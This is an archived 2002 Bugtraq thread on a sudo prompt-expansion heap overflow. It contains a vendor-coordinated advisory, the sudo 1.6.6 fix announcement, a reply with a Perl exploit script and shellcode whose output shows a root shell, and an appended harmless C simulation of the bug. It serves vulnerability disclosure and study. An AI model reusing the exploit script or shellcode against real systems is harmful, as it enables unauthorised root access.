8344561 2002-04-25 14:17 +0000 /207 lines/ Global InterSec Research <lists@globalintersec.com>
Sent by: joel@lysator.liu.se
Imported: 2002-04-25 18:47 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External Cc recipient: research@globalintersec.com
Recipient: Bugtraq (import) <22050>
Subject: [Global InterSec 2002041701] Sudo Password Prompt Vulnerability.
------------------------------------------------------------
From: Global InterSec Research <lists@globalintersec.com>
To: bugtraq@securityfocus.com
Cc: research@globalintersec.com
Message-ID: <4.2.0.58.20020425141650.06763e90@193.133.49.25>

Global InterSec LLC
http://www.globalintersec.com

GIS Advisory ID: 2002041701
Changed: 25/04/2002
Author: research@globalintersec.com
Reference: http://www.globalintersec.com/adv/sudo-2002041701.txt

Summary:

Sudo - A popular utility for allowing users to execute commands as other users contains a vulnerability which may be exploited to execute arbitrary commands.

Impact:

A local user may gain root access through corruption of the heap (Off-By-Five).

Versions Tested To Be Vulnerable:

1.6.5p2
1.6.4
1.6.3p7 (SuSE 7.1 Update, RedHat 7.2)
1.6.3 (SuSE 7.1)
1.6.2

Description:

Sudo, an open source utility shipped with many Linux distributions, enables the super user to grant non-root users permission to execute commands as other users (including root). Access to sudo is normally regulated via /etc/sudoers.

One of the functions of sudo enables users to specify the password prompt given when challenged for their password to 'sudo'. On passing this parameter (-p) to sudo, a user may also specify characters which expand to either the hostname (%h) or the username (%u).

On the reception of these expansion characters, sudo will malloc() memory for the string the argument to -p will form. Unfortunately it is possible to trick sudo into allocating less memory than it should for the prompt.
Under certain conditions it is possible to exploit this bug to corrupt the heap in a way which could be used to execute arbitrary commands. Because of the nature of sudo, it is installed by default as suid root and therefore could be used to escalate normal user privileges to that of the root user, taking into account the restrictions noted below.

Scope for attack:

As noted above, this vulnerability could be used to escalate user privileges to that of the super user. However, for this to happen several factors must be considered.

- The options which sudo was compiled with may determine if it is exploitable or not. In our tests we used binaries compiled with PAM support, which we found to be exploitable. Many distributions of Linux ship with PAM enabled builds of sudo. Distributions shipping PAM enabled sudo binaries include those of SuSE and RedHat.

- The length of the hostname on the system a vulnerable binary is on is a critical factor in the way in which the bug is exploited.

Work around:

Remove the suid bit from the sudo binary and remove any entries in /etc/sudoers.

Credit:

This vulnerability was originally discovered by fc, a GIS affiliate. Research and vendor coordination were carried out by the Global InterSec research division, under Tom Parker. Please email research@globalintersec.com for more information. Thanks also to Todd Miller, the sudo maintainer, for responding so quickly to our email.

Vendor Solutions:

A patch for version 1.6.5p2 is available at:

http://www.globalintersec.com/adv/files/sudo-1.6.5p3.patch

Both the Sudo maintainer and vendors shipping vulnerable versions of sudo have been notified well in advance of the release date. A list of advisories by individual vendors will be appended to this advisory as they become available. The most recent copy of this advisory is available at the "Reference" URL noted in the header of this advisory.
Proof of Concept, Semi-Technical Details:

When sudo is called with the -p parameter, expand_prompt() is called to check for and expand any special characters parsed as arguments to -p (%h or %u). expand_prompt will then calculate space for the expanded prompt and malloc() the calculated amount. On miscalculation of the required space, the place in which sudo breaks will depend on:

- The string used to cause sudo to miscalculate the required space and the length which any expansion character(s) expand to.

- The compilation options sudo was built with.

These factors therefore have a direct influence on how the bug is to be exploited, if at all.

In the case of a string 'h%h%' being passed to the -p option, miscalculation of the prompt length occurs due to the first h in our string being treated as an %h and the last character still having the value of % where it should have been given the value '\0' if *lastchar had been re-initialised correctly.

In the example below we used a system whose hostname was 7 bytes long. Because of the length of the hostname, we were able to trigger the vulnerability, but without causing a SEGV, before we were able to write additional data into memory for sudo to read into. In the case of a system with a hostname over 8 bytes, you may find that the expansion of the hostname has written so far into memory that sudo segfaults before additional memory can be written via the password prompt. In this case an alternative method would be needed to write into memory so that relevant registers are corrupted. This could possibly be in parameters to -p or in the environment variable 'SUDO_PROMPT' (which -p overrides).

  user@defiant:~/research/sudo/dist/sudo-1.6.5p2 > gdb sudo
  GNU gdb 5.0
  Copyright 2000 Free Software Foundation, Inc.
  (gdb) r -p h%h% -s
  Starting program: /research/sudo/dist/sudo-1.6.5p2/sudo -p h%h% -s
  efiantdefian¡ <4 Bytes>\xef\xbe\xad\xde\<84 Bytes>    # Password Challenge
  Sorry, try again.
  Program received signal SIGSEGV, Segmentation fault.
  0x400d49c1 in chunk_alloc () from /lib/libc.so.6
  (gdb) i r $edi
  edi            0xdeadbeef       -559038737
  (gdb)

Note that %ecx and %edx were also within our reach.

Our example used a sudo 1.6.5p2 binary with --with-pam enabled at build time. The off-by-five condition still occurs when sudo is compiled without PAM, as we can see from the following example, using a slightly modified version of sudo.

  user@defiant:~/research/sudo/dist/sudo-1.6.5p2 > ./sudo -p h%h% -s
  Allocating 9 bytes for prompt: efiantdefiant% (14 bytes long)
  efiantdefiant%
  Sorry, try again.
  efiantdefiant% ^C
  ./sudo: 1 incorrect password attempt
  user@defiant:~/research/sudo/dist/sudo-1.6.5p2 >

To this end - sudo without PAM support (or any other configuration) must be considered vulnerable, as alternative ways to cause functions in sudo to read into corrupted areas of memory and gain flow control of sudo (other than the PAM functions) may exist.

Please see:

http://www.phrack.org/show.php?p=57&a=8

for more information on exploiting this type of vulnerability.

Legal:

This advisory is the intellectual property of Global InterSec LLC but may be freely distributed with the conditions that:

a) No fee is charged
b) Appropriate credit is given.

(c) Global InterSec LLC 2002

(8344561) /Global InterSec Research <lists@globalintersec.com>/(Reflowed)
Comment in text 8344573 by the Exporter

8344636 2002-04-25 19:08 +0200 /93 lines/ Jonas Eriksson <je@sekure.net>
Sent by: joel@lysator.liu.se
Imported: 2002-04-25 19:14 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <22051>
Subject: Sudo version 1.6.6 now available (fwd)
------------------------------------------------------------
From: Jonas Eriksson <je@sekure.net>
To: bugtraq@securityfocus.com
Message-ID: <Pine.BSO.4.44.0204251907570.5119-100000@birdie.sekure.net>

---------- Forwarded message ----------
Date: Thu, 25 Apr 2002 10:34:13 -0600
From: Todd C. Miller <Todd.Miller@courtesan.com>
To: sudo-announce@courtesan.com
Subject: Sudo version 1.6.6 now available

Sudo version 1.6.6 is now available (ftp sites listed at the end).

Changes since Sudo 1.6.5p2:

 o Fixed compilation problem on HP-UX 9.x.
 o Moved call to endpwent() and added a call to endgrent().
 o Fixed a warning conflicting declaration of VOID with AFS.
 o Fixed a security hole in prompt rewriting found by Global InterSec.

Please note that Sudo 1.6.6 fixes a security hole present in sudo versions 1.5.7 - 1.6.5p2. Please see:

    http://www.sudo.ws/pipermail/sudo-announce/2002-April/000020.html
    http://www.globalintersec.com/adv/sudo-2002041701.txt

for details.

sudo 1.6.6 distribution:
    ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz

Master WWW site:
    http://www.sudo.ws/sudo/dist/

Mirrors (not yet updated)

WWW Mirrors:
    http://sudo.stikman.com/ (Los Angeles, California, USA)
    http://mirage.informationwave.net/sudo/ (Fanwood, New Jersey, USA)
    http://sudo.planetmirror.com/ (Australia)
    http://sudo.cdu.elektra.ru/ (Russia)

Master FTP sites:
    ftp.sudo.ws:/pub/sudo/
    ftp.cs.colorado.edu:/pub/sudo/

FTP Mirrors:
    ftp.cs.colorado.edu:/pub/sudo/ (Boulder, Colorado, USA)
    ftp.stikman.com:/pub/sudo/ (Los Angeles, California, USA)
    ftp.uu.net:/pub/security/sudo/ (Falls Church, Virginia, USA)
    ftp.tux.org:/pub/security/sudo/ (Beltsville, Maryland, USA)
    ftp.cerias.purdue.edu:/pub/tools/unix/sysutils/sudo/ (West Lafayette, Indiana, USA)
    ftp.uwsg.indiana.edu:/pub/sudo/ (Bloomington, Indiana, USA)
    sudobash.com:/pub/sudo/ (Ypsilanti, Michigan, USA)
    ftp.tamu.edu:/pub/mirrors/ftp.courtesan.com/ (College Station, Texas, USA)
    ftp.rge.com:/pub/admin/sudo/ (Rochester, New York, USA)
    mirage.informationwave.net:/sudo/ (Fanwood, New Jersey, USA)
    ftp.wiretapped.net:/pub/security/host-security/sudo/ (Australia)
    ftp.tuwien.ac.at:/utils/admin-tools/sudo/ (Austria)
    sunsite.ualberta.ca:/pub/Mirror/sudo/ (Alberta, Canada)
    ftp.csc.cuhk.edu.hk:/pub/packages/unix-tools/sudo/ (Hong Kong, China)
    ftp.eunet.cz:/pub/security/sudo/ (Czechoslovakia)
    ftp.umds.ac.uk:/pub/sudo/ (Great Britain)
    ftp.tvi.tut.fi:/pub/security/unix/sudo/ (Finland)
    ftp.lps.ens.fr:/pub/software/sudo/ (France)
    ftp.crihan.fr:/pub/security/sudo/ (France)
    ftp.rz.uni-osnabrueck.de:/pub/unix/security/sudo/ (Germany)
    ftp.win.ne.jp:/pub/misc/sudo/ (Japan)
    ftp.st.ryukoku.ac.jp:/pub/security/tool/sudo/ (Japan)
    ftp.eos.hokudai.ac.jp:/pub/misc/sudo/ (Japan)
    ftp.tokyonet.ad.jp:/pub/security/sudo/ (Japan)
    ftp.kobe-u.ac.jp:/pub/util/security/tool/sudo/ (Japan)
    ftp.cin.nihon-u.ac.jp:/pub/util/sudo/ (Japan)
    ftp.fujitsu.co.jp:/pub/misc/sudo/ (Japan)
    core.ring.gr.jp:/pub/misc/sudo/ (Japan)
    ftp.ring.gr.jp:/pub/misc/sudo/ (Japan)
    ftp.ayamura.org:/pub/sudo/ (Japan)
    ftp.iphil.net:/pub/sudo/ (Makati City, Philippines)
    ftp.icm.edu.pl:/vol/wojsyl5/sudo/ (Poland)
    ftp.assist.ro:/pub/mirrors/ftp.courtesan.com/pub/sudo/ (Romania)
    ftp.sai.msu.su:/pub/unix/security/ (Russia)
    ftp.cdu.elektra.ru:/pub/unix/security/sudo/ (Russia)
    ftp.mc.hik.se:/pub/unix/security/sudo/ (Sweden)
    ftp.sekure.net:/pub/sudo/ (Sweden)
    ftp.edu.tw:/UNIX/sudo/ (Taiwan)
    ftp.comu.edu.tr:/pub/linux/prog/sudo/ (Turkey)

____________________________________________________________
sudo-announce mailing list <sudo-announce@sudo.ws>
For list information, options, or to unsubscribe, visit:
http://www.sudo.ws/mailman/listinfo/sudo-announce

(8344636) /Jonas Eriksson <je@sekure.net>/----------
Comment in text 8345685 by Przemyslaw Frasunek <venglin@freebsd.lublin.pl>

8345685 2002-04-25 21:01 +0200 /87 lines/ Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
Sent by: joel@lysator.liu.se
Imported: 2002-04-26 00:32 by Brevbäraren
External recipient: vuln-dev@securityfocus.com
External Cc recipient: bugtraq@securityfocus.com
External replies to: venglin@freebsd.lublin.pl
Recipient: Bugtraq (import) <22053>
Comment to text 8344636 by Jonas Eriksson <je@sekure.net>
Subject: Re: Sudo version 1.6.6 now available (fwd)
------------------------------------------------------------
From: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
To: vuln-dev@securityfocus.com
Cc: bugtraq@securityfocus.com
Message-ID: <m34rhzpppq.fsf@clitoris.czuby.net>

Jonas Eriksson <je@sekure.net> wrote:

> o Fixed a security hole in prompt rewriting found by Global InterSec.

Looks like it won't be easy to exploit. There are a few possible scenarios: using an unlink() or frontlink() macro in chunk_alloc() or chunk_free(). In both cases we can control fd and bk pointers passed to the macros, using the long pathname argument.

The most important problem is to set the fake chunk size to a safe value. It must be positive (to pass the condition in chunk_alloc() before unlink()) and quite small (remainder + remainder_size must be a valid pointer). With the smallest possible value without NULL bytes (0x01010101) it segfaults. It can't be negative either.

  0x08054bff in chunk_alloc (ar_ptr=0x805f9a0, nb=80) at malloc.c:2996
  2996            set_foot(remainder, remainder_size);

The set_foot() macro is called just after the offending unlink(). The arbitrary address is already overwritten, but remainder_size is way too big. This scenario is possible to exploit when a SIGSEGV sighandler would be set (but it's not).

The code attached below ISN'T A WORKING EXPLOIT. It's only my demonstration of how it would be exploitable in case a SIGSEGV handler is set or the set_foot() macro does not segfault.

  [venglin@clitoris sudo-1.6.5p2]$ cat babunia.pl
  $sudo = $ARGV[0];
  $prompt = "h%h%h%h%aaaaaaaaaaaaaaaaaaaah%";
  $prepad = 266;
  $postpad = 512;
  $retloc = hex(`objdump -R $sudo | grep '\\<_exit\\>' | cut -f1 -d' '`);
  $retad = 0x8063b10;
  $align = 20;

  print "Prompt: $prompt\n";
  print "Prepad: $prepad\n";
  print "Postpad: $postpad\n";
  print "Align: $align\n";
  print "_exit() @ ", sprintf("0x%x\n", $retloc);
  print "shellcode @ ", sprintf("0x%x\n", $retad);

  $testcode = "\xeb" . chr($align);
  $testcode .= "\x90" x $align;
  $testcode .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c";
  $testcode .= "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb";
  $testcode .= "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

  $frame = pack('l', 0x01010101);
  $frame .= pack('l', $retloc-12);
  $frame .= pack('l', $retad);

  $path = "a" x $prepad;
  $path .= $frame;
  $path .= $testcode;
  $path .= "a" x ($postpad - length($testcode));

  system($sudo, "-p", $prompt, $path);

  [venglin@clitoris sudo-1.6.5p2]$ perl ./babunia.pl ./sudo
  Prompt: h%h%h%h%aaaaaaaaaaaaaaaaaaaah%
  Prepad: 266
  Postpad: 512
  Align: 20
  _exit() @ 0x805fe40
  shellcode @ 0x8063b10
  litorisclitorisclitorisclitoris%aaaaaaaaaaaaaaaaaaaah%
  Sorry, try again.
  litorisclitorisclitorisclitoris%aaaaaaaaaaaaaaaaaaaaI ¨¨ry again.
  litorisclitorisclitorisclitoris%aaaaaaaaaaaaaaaaaaaaI ¨¨ry again.
  ./sudo: 3 incorrect password attempts
  # id
  uid=0(root) gid=1000(users) egid=0(root) groups=1000(users),6(disk),23(audio),24(video)

My recent idea was to expand the heap by passing 0x01010101 bytes of environment variables, so remainder + remainder_size would be reachable and the set_foot() macro wouldn't segfault. But I haven't tried it out yet.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *

(8345685) /Przemyslaw Frasunek <venglin@freebsd.lublin.pl>/(Reflowed)
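The off-by-five from the advisory's 'h%h%' run on the 7-byte host "defiant" (9 bytes sized, "efiantdefiant%" written), and the one-line reset that 1.6.6 applies, can both be reproduced without touching a real heap. The C below is an added example, not code from the advisory, from the thread or from sudo itself: it models the two-pass expand_prompt() logic as the advisory describes it (a sizing pass, then a copy pass that reuses the stale lastchar) and only records which offsets the copy pass would write, so running it is harmless. The prompt, host and user strings are constructed inputs.

```c
#include <stdio.h>
#include <string.h>
/* One simulated expand_prompt() run. Offsets are relative to the buffer sudo
 * would allocate; writes go to a scratch area with slack, so nothing overflows. */
struct prompt_sim {
    size_t allocated;      /* len + 1, the size sudo requests from emalloc() */
    long lowest, highest;  /* extreme offsets written, NUL included */
    char out[128];         /* what ends up from offset 0 onwards */
};
/* stale_lastchar = 1 models 1.6.5p2 (lastchar carried over from the sizing
 * pass); 0 models the 1.6.6 fix (lastchar reset before the copy pass).
 * Returns the number of bytes written past the end of the allocation. */
static long simulate_expand(const char *prompt, const char *host,
                            const char *user, int stale_lastchar,
                            struct prompt_sim *r)
{
    char scratch[512] = {0}, lastchar = '\0';
    const long base = 64;  /* slack for writes below offset 0 */
    size_t len = strlen(prompt);
    long np = 0;
    const char *p;
    /* Pass 1: sizing. Each "%h" / "%u" adds strlen(name) - 2 bytes. */
    for (p = prompt; *p; p++) {
        if (lastchar == '%' && *p == 'h') len += strlen(host) - 2;
        else if (lastchar == '%' && *p == 'u') len += strlen(user) - 2;
        lastchar = (lastchar == '%' && *p == '%') ? '\0' : *p;
    }
    r->allocated = len + 1;
    r->lowest = r->highest = 0;
    if (!stale_lastchar) lastchar = '\0';  /* the one-line fix */
#define PUT(off, ch) do { long o_ = (off);                                   \
        if (o_ + base < 0 || o_ + base >= (long)sizeof scratch) return -1;   \
        if (o_ < r->lowest) r->lowest = o_;                                  \
        if (o_ > r->highest) r->highest = o_;                                \
        scratch[o_ + base] = (ch); } while (0)
    /* Pass 2: copy. A stale '%' makes the very first 'h' look like "%h": np--
     * steps in front of the buffer and the hostname then overruns its end. */
    for (p = prompt; *p; p++) {
        if (lastchar == '%' && (*p == 'h' || *p == 'u' || *p == '%')) {
            const char *sub = (*p == 'h') ? host : (*p == 'u') ? user : "";
            if (*sub) np--;  /* back up over the '%' copied one step earlier */
            for (; *sub; sub++) PUT(np++, *sub);
        } else PUT(np++, *p);
        lastchar = (lastchar == '%' && *p == '%') ? '\0' : *p;
    }
    PUT(np, '\0');
#undef PUT
    snprintf(r->out, sizeof r->out, "%s", scratch + base);
    return r->highest < (long)r->allocated ? 0 : r->highest + 1 - (long)r->allocated;
}
```

With the stale lastchar the 'h%h%' prompt sizes to 9 bytes but writes from offset -1 through 14, one byte below the buffer and five past its end; with the reset it writes exactly "hdefiant%" inside the 10 bytes requested.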